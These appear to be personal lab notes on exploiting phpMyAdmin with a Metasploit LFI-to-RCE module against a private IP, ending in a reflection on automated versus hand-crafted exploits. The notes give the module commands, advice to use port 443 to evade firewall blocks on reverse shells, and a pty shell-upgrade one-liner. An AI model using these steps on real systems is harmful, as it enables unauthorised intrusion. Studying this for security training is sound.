search <phpmyadmin>: Search for modules

grep <2018> search <phpmyadmin>: Filter search for specific disclosure years

use <exploit/multi/http/phpmyadmin_lfi_rce>: Choose a module to work with

options: display all options for module, check all required settings

set <RHOSTS> <10.0.5.28>: Set a setting to a value (here I am setting Remote Hosts to my target's IP

exploit: Runs the exploit

• Setting the LPORT to 443 is important because many firewalls block metasploits default port 4444, sysadmins typically allow ports like 443 or 22.

• Once a shell is created typing python3 -c 'import pty;pty.spawn("/bin/bash")' creates a usable terminal for you to execute commands in.

Metasploit makes it really easy to automate attacks especially if a site or service is using outdated versions of their programs. I ran into some bumps and actually chose to use this module for my first try, except I didnt set the LPORT to 443 and instead left it as 4444. The reverse TCP connection didnt work and so I ended up going down a rabbit hole trying every phpmyadmin module and many different apache exploits. I eventually figured out what to do and got it working.

Hand crafted exploits are definitely harder but you're there for the whole process so you know if the exploit simply doesnt work or if its another issue. I just had problems troubleshooting because it's almost too easy which makes it hard to have a deeper level of understanding about the exploits you're using.